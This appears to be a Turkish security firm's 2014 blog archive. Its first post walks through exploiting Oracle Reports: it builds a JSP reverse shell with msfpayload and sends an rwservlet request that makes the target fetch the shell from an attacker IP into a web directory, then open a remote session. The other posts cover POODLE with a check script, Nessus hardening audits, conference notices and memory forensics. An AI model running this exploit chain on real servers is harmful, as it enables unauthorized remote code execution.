20 11 2014

Oracle form, Oracle veritabanı ile etkileşimli ekranlar oluşturabilen Oracle Fusion Middleware’in bir eklentisidir. Oracle Report ise Oracle form’un raporlama aracıdır. Bu yazıda Oracle Report üzerindeki açıklığın nasıl istismar edileceği anlatılmıştır.


Saldırgan IP’si: 6.6.6.51
Hedef Oracle Repor IP’si: 6.6.6.52


Oracle Reports’un aşağıdaki sayfasında Oracle Reports’un her biri farklı görevleri yapmakta olan komut listesi görülmektedir.




Tüm komutlar çağrılıp kontrol edildiğinde istismar sırasında kullanılabilecek bazı önemli komutlar olduğu görülebilir. Öncelikle showenv komutundan bahsetmek gerekirse, bu komut sunucu ile ilgili bilgileri (servermap, servername, serverport vb.) ekrana dökmektedir.




Göze çarpan en önemli nokta PATH_TRANSLATED değişkeninin yerel dizini vermesidir. Yerel dizinin elimizde olması büyük avantaj sağlamaktadır. Bu bilgiyi not ettikten sonra ilerleyebiliriz.


Önce msfpayload yardımı ile payload oluşturulur. Web sunucusu jsp çalıştırmaktadır ve bunun için java/jsp_shell_reverse_tcp payload’u kullanılır.




Reverse TCP için abc.jsp dosyası oluşturuldu. Ancak bu shell direk olarak çalışmayacaktır. Çünkü msfpayload aracı bu payload'u Windows ortamı için hazırladı, hedef sistem ise Linux tabanlı olduğu için, jsp dosyasının aşağıdaki gibi düzenlenmesi gerekir.


Process process = Runtime.getRuntime().exec( "cmd.exe" );
satırı
Process process = Runtime.getRuntime().exec( "/bin/sh" );
olarak değiştirilir.


Gerekli düzenlemeyi yaptıktan sonra dosyanın uzantısını .txt olarak ayarlayıp, /var/www/ dizini altına herhangi bir isimle atılır.


Yazıda bize lazım olacak kısımların olduğu belirtilmişti. Oracle Report’ta rapor oluşturmak için kullanılan istek yakalanmış ve  istismar için gerekli kısımlar eklenmiştir. Sonuçta oluşan istek şu şekildedir:


http://6.6.6.52:7777/reports/rwservlet?report=Bga_Tiger_Team.rdf+desformat=html+destype=file+desname=/data01/BI/j2ee/OC4J_BI_Forms/applications/reports/web/images/sh.jsp+JOBTYPE=rwurl+URLPARAMETER="http://6.6.6.51/ora11/s.txt"
    


İsteği açıklama gerekirse;
report = raporun adı
desformat = rapor formatı
destype = rapor türü
desname = rapor dosyasının yerel dizini


İstek gönderilir ve sunucudan dönen cevap işlemin başarılı olduğunu göstermektedir.


Kontrol etmek için showjobs komutu kullanılabilir:


Ekran görüntüsünden dosyanın sunucuya başarı ile indirildiğinin teyiti alınabilir.
Artık yapılması gereken 2 adım kaldı: Saldırgan(6.6.6.51) makinesini listener moda almak ve Oracle(6.6.6.52) makinesinden ilgili dosyayı çalıştırmak.
Saldırgan makinesinde listener moda geçtikten sonra, yüklenen dosya direk olarak tarayıcıdan çağırıldığında hedeften oturum açılmış olacaktır.



7 11 2014

Bash 'Shellshock' Güvenlik Açıklığı İstismar Yöntemleri

CGI(Common Gateway Interface) web sayfaları ve web uygulamalarına dinamik içerik üretmek için kullanılan standart bir yöntemdir. Bu yöntem sistem üzerinde bash komutlarının çalıştırılabilmesine de olanak sağlamaktadır. Bash kabuğu üzerinde farkedilen bir güvenlik açığı sayesinde ise bu avantajlı durum bir anda atak vektörü haline gelmiştir.


Bu blog yazsısında, hedef sistem üzerinde /cgi-bin/ klasörü altında bulunan dosyalar üzerinden bu açıklığın nasıl istismar edilebileceği uygulamalı olarak anlatılacaktır. Yapılan uygulamalar http://vulnhub.com/entry/pentester-lab-cve-2014-6271-shellshock,104/ adresinde bulunan bu zafiyete özel olarak hazırlanmış dağıtım üzerinden gerçekleştirilecektir.

30 10 2014

Siber Güvenlik Etkinligi - Ankara / 6 Kasım 2014

Son yıllarda dünyaya damgası vuran ve siber dünyadan gelebilecek tehditlere karşı önemini daha çok hissettiren siber güvenlik, siber casus yetiştirme politikaları, siber savaşlar ve bu alana yönelik olarak ülkelerin bütçelerinden ayırdıkları hatırı sayılır oranlara ulaşan rakamlar, siber güvenlik kavramını bireysel, kurumsal ve ülke güvenliği açısından kritik öneme kavuşturmuştur.

Bilgi Güvenliği AKADEMİSİ (www.bga.com.tr) ve Kamu Siber Güvenlik Derneği (www.kamusgd.org.tr) işbirliğiyle ortaklaşa düzenlenecek olan Siber Güvenlik Etkinliği, kamu ve özel sektördeki ilgili uzmanları bir araya getirerek bu eksendeki soru ve sorunlara cevap ve çözüm önerileri sunmayı hedeflemektedir.

Yer & Tarih
Siber Güvenlik Etkinliği, 6 Kasım 2014 tarihinde TOBB Ekonomi ve Teknoloji Üniversitesi Söğütözü Caddesi No:43, Söğütözü/Ankara adresinde gerçekleştirilecektir.
Etkinlik programına http://www.siberguvenlik.org/p/konferans-programi.html adresinden ulaşılabilir.
Katılım & Kayıt:
Kayıtlar http://siberguvenlik.eventbrite.com adresi kullanılarak yapılmaktadır.
Not: Kayıt konusunda problem yaşayanlar veya kurum adına toplu katılım gerçekleştirmek isteyenler bilgi@siberguvenlik.org adresine e-posta gönderebilirler.
İletişim:
Konferansla ilgili tüm geri bildirimler için bilgi@siberguvenlik.org adresine e-posta gönderebilirsiniz.
Ulaşım:
TOBB Ekonomi ve Teknoloji Üniversitesi Söğütözü Caddesi No:43, Söğütözü/Ankara

15 10 2014

SSLv3 POODLE Zafiyeti

SSLv3 POODLE (Padding Oracle On Downgraded Legacy Encryption) zafiyeti bir çeşit kriptografik tasarım zafiyetidir. Zafiyet esas olarak SSLv3’ün kripto bloğunun sonuna eklenen padding bitlerinin içeriğini belirlememesi ve önce deşifre sonra kimlik doğrulama işlemini yapmasından kaynaklanmaktadır.

Bu açık sayesinde bir saldırgan 1/256 ihtimalle SSLv3 ile şifrelenmiş trafiği başarılı bir şekilde deşifre edebilir. Bu ihtimal bir byte içindir, dolayısıyla toplamda N byte’lık bir veriyi deşifre etmek için ortalama 256*N adet deneme yapmak gerekmektedir.

Zafiyetin en uygulanabilir saldırı vektörü MITM (man in the middle) durumudur. İstemci ile sunucu arasındaki trafiğin kendi üzerinden geçmesini sağlayan saldırgan, SSL el sıkışması adımlarına müdahele edip bağlantıda SSLv3 kullanılmasını zorlayabilir. Tabi istemci ve sunucunun, daha güncel protokollerin yanısıra SSLv3’ü de destekliyor olması gerekmektedir.

Yukarıdaki koşulları sağlayan bir saldırgan istemci ve sunucu arasındaki SSLv3 ile şifrelenmiş trafiği kısmen de olsa deşifre etme şansı bulacaktır. Trafik içerisinden elde edilen bazı önemli bölümler (örneğin HTTP çerezleri) oturum hırsızlığı gibi son derece tehlikeli saldırıların gerçekleştirilmesine imkan tanır.

Bir sunucunun SSLv3’ü destekleyip desteklemediği aşağıdaki bash betiği kullanılarak kontrol edilebilir.

#!/bin/bash
ret=$(echo Q | timeout 5 openssl s_client -connect "${1-`hostname`}:${2-443}" -ssl3 2> /dev/null)
if echo "${ret}" | grep -q 'Protocol.*SSLv3'; then
  if echo "${ret}" | grep -q 'Cipher.*0000'; then
    echo "SSL 3.0 disabled"
  else
    echo "SSL 3.0 enabled"
 fi
else
  echo "SSL disabled or other error"
fi


İstemci tarafında ise tarayıcıları test etmek için https://www.poodletest.com/ adresi kullanılabilir.


Kaynaklar:
https://access.redhat.com/articles/1232123
https://www.imperialviolet.org/2014/10/14/poodle.html

10 10 2014

Nessus Denetleme Dosyaları Aracılığı İle Güvenlik Sıkılaştırma Denetimleri


Başka cihazlarla etkileşim halinde olan neredeyse tüm cihazlar için alınması gereken güvenlik önlemleri mevcuttur. Daha karmaşık cihazlarda alınması gereken önlemlerde, haliyle çok olmaktadır. Bazı sistemler için alınması gereken önlemler kitapçıklar halinde yeni sürümler ile birlikte yayınlanmaktadır. Yayınlanan standartlar arasında en çok kabül gören standartlar  CIS security Benchmark’lardır. CIS tarafından hangi ürünler için güvenlik sıkılaştırma rehberlerinin yayınlandığı, aşağıdaki linkten incelenebilir ve oluşturulmuş basit form doldurularak gerekli doküman indirilebilir.

Zafiyet tarama araçları arasında en çok tanınan ve kullanılan araçlardan biri olan Nessus programı geliştiricileri, CIS tarafından yayınlanan hemen her güvenlik klavuzları için otomatize taramalara imkan veren, modüller geliştirilir. Bu modüller “audit” dosyaları olarak da tanınmaktadır. XML tabanlı yazılmış bu dosyalar indirilip sisteme tanıtıldıktan sonra hedef sistem bir kaç fare tıklaması ile gerekli güvenlik önlemleri için tarananabilir.
Aşağıda örnek bir tarama çıktısı verilmiştir;



Tarama sonucunu rapor olarak almak mümkün. Rapor
  • HTML
  • PDF
  • Nessus
  • Nessus DB
  • CSV
formatlarında alınabilir. Rapor sonucunda her güvenlik adımı için iki durum bulunabilir;
PASSED: güvenlik önleminin sistemde mevcut olduğunu belirtir.
FAILED: güvenlik önleminin sistemde henüz alınmadığını belirtir.


Bir sistemin Nessus denetleme dosyaları ile nasıl denetlendiğini göstermek için hedef sistem olarak bir çok kurumda kullanılan Redhat Enterprise kullanılacaktır.

Not: Burada amaç olarak Nessus denetleme dosyalarının kısaca kullanımı ve sonucunun yorumlanması anlatılacağından, Nessus'da politika oluşturulması ve tarama detaylarından bahsedilmeyecektir.
Öncelikle sıkılaştırma işleminin yürütüleceği bir politika tanımlanmalıdır. Politikalar sayesinde bir sistemde tüm açıklıklar test edilmez sadece o hedef sistemler için geçerli olan açıklıkların varlığı tespit edilmeye çalışılır. Burada oluşturulacak politika “Advanced Policy” ama diğerleri de seçilebillir nihayetinde eklentiler kısmı düzenlenecektir. İlgili sayfaya ait ekran görüntüsü;



“General Settings” sekmesinden Name parametresine politika ismi girilir.
“Credentials” sekmesinden hesap tanımlamak gereklidir. Hedef sistemde oturum açılmadan sıkılaştırma adımlarının kontrolü mümkün değildir. Hedef sistemin işletim sistemine göre bir seçim yapılır, burada hedef sistem “Redhat Enterprise Linux” olduğu için “SSH Settings özelliği seçilecektir. Gerekli değerler girilir ve kaydedilir.


Sonra “Plugins” sekmesinden tüm sadece iki politika gurubu aktif edilir.
  1. Policy Comliance
  2. Redhat Local Security (burada Redhat Enterprise Linux kullanıldğı için).
Daha sonra Prefences sekmesinden “Prefences Type” özelliklerinden “Unix Compliance Checks” ayarları seçilir ve hedef sistem için indirilen denetleme dosyası tanıtılır.
İlgili düzenlemelerin yapıldığı Prefences penceresine ait ekran görüntüsü;

Ayarlar kaydedilten sonra sıra bir tarama başlatmaya gelir.
Scans sekmesinden “New Scan” butonu tıklanır ve ilgili değerler doldurulur. İlgili alanların doldurulmuş halinin ekran görüntüsü;



Tarama bittikten sonra elde edilecek görüntü;



Burada önemli olan ve dikkat edilmesi gereken “Failed” ibaresinin bulunduğu tarama sonuçlarıdır.

Bu aşamadan sonra atılmayan güvenlik sıkılaştırma adımlarının atılması kalmıştır. Her ne kadar nessus denetleme dosyaları özenle hazırlanmış olsa da sunulan çözüm adımları açıklayıcı olmayabilir. Bundan dolayı nessus çıktılarından hangi adımların atılması gerektiği belirlenip CIS dokümanlarından da ilgili adımlar atılırsa hem daha anlaşılır hemde sağlıklı olacaktır.

9 10 2014

IstSec '14 Istanbul Bilgi Güvenliği Konferansı - 15 Ekim 2014

Ülkemizde eksikliği her geçen gün daha fazla hissedilen ürün/teknoloji bağımsız, çözüm odaklı güvenlik anlayışına katkı sağlamak amacıyla, her yıl düzenli olarak gerçekleştirilen İstanbul’a özel Bilgi Güvenliği Konferansı olan İstSec, bu yıl 15 Ekim 2014 Tarihinde Bahçeşehir Üniversitesi Beşiktaş Kampüsünde gerçekleştirilecektir.
Türkiye’den ve çeşitli ülkelerden konusunda söz sahibi bilgi güvenliği uzmanlarını ve BT güvenliği meraklılarını buluşturacak olan İstSec 2014’ün bu yılki ana teması “Siber Güvenlikte Ortak Vizyon: Yetişmiş İnsan Kaynağı” olarak belirlenmiştir
BGA ekibinden Onur ALANBEL ve Huzeyfe ÖNAL aşağıdaki sunum konularıyla katılım sağlayacaktır.
Huzeyfe ÖNAL - Siber Tehditler Karşısında Kurumsal SOME Kurulum ve Yönetimi Onur ALANBEL - A'dan Z'ye Son Çıkan Shellshock Zafiyeti İnceleme ve İstismar Yöntemleri

8 10 2014

Siber güvenlik dünyasında son yılların önemli konularından biri APT olarak karşımıza çıkmaktadır. Farklı tanımları olsa da APT - Advanced PErsisten Threat- kısaca hedef odaklı karmaşık ve kalıcı tehditler anlamına gelmektedir ki burada her bir harfi önem taşımaktadır. Klasik arz talep dengesi mantığıyla hareket edildiği için piyasada hızlı bir şekilde APT engelleme ürünlerinin çıkmaya başladığını görmekteyiz. Bu ürünlerin bir kısmı gerçekten APT kavramını karşılar nitelikte olsa da büyük çoğunluğu klasik Antivirüs/IDS ve Antimalware ürünlerine yapılan makyajla APT olarak sunulmasıdır.

7 10 2014

BGA Bilgi Güvenliği Danışmanlık Hizmetleri

BGA olarak Bilgi Güvenliği danışmanlık çatısı altında kurumun güvenlik ihtiyaçlarını anlayan, saldırıları öngörebilen ve siber güvenlik konusunda doğru alanda yatırım yapılmasını sağlamayı amaçlıyoruz. Genişleyen kadromuzla Türkiye ve Azerbaycan'ın ileri gelen kamu kurumları ve özel şirketlerine stratejik siber güvenlik danışmanlığı yapmaktayız.

BGA, Yetkili "Pearson VUE" Test Merkezi Oldu

Pearson VUE ile yaptığımız görüşmelerin olumlu sonuçlanmasıyla birlikte 25 Eylül 2014 tarihi itibariyle BGA İstanbul şubesinde aşağıda ismi geçen firmalara ait sınavları verme yetkisi tanınmıştır. Gelen yoğun talep nedeniyle şimdilik sadece hafta içi Çarşamba günleri sınav katılım talepleri değerlendirilmektedir.
Linux sistemlerde bellek analizinin son adımında şüpheli kernel aktiviteleri ve dosya sistemi işlemleri tespit edilmeye çalışılır. Bu sayede sisteme bağlı olan IO cihazları, son yapılan IO aktiviteleri, rootkit gibi kernel seviyesinde çalışan zararlıların etkileri gözlenir.

İlk olarak “./vol.py linux_dmesg” komutuyla sistem mesajları görüntülenir. Örnekte sisteme bağlanılan USB belleğin adı (Kingston DataTraveler) ve atanan cihaz adı (sdc) vurgulanmıştır.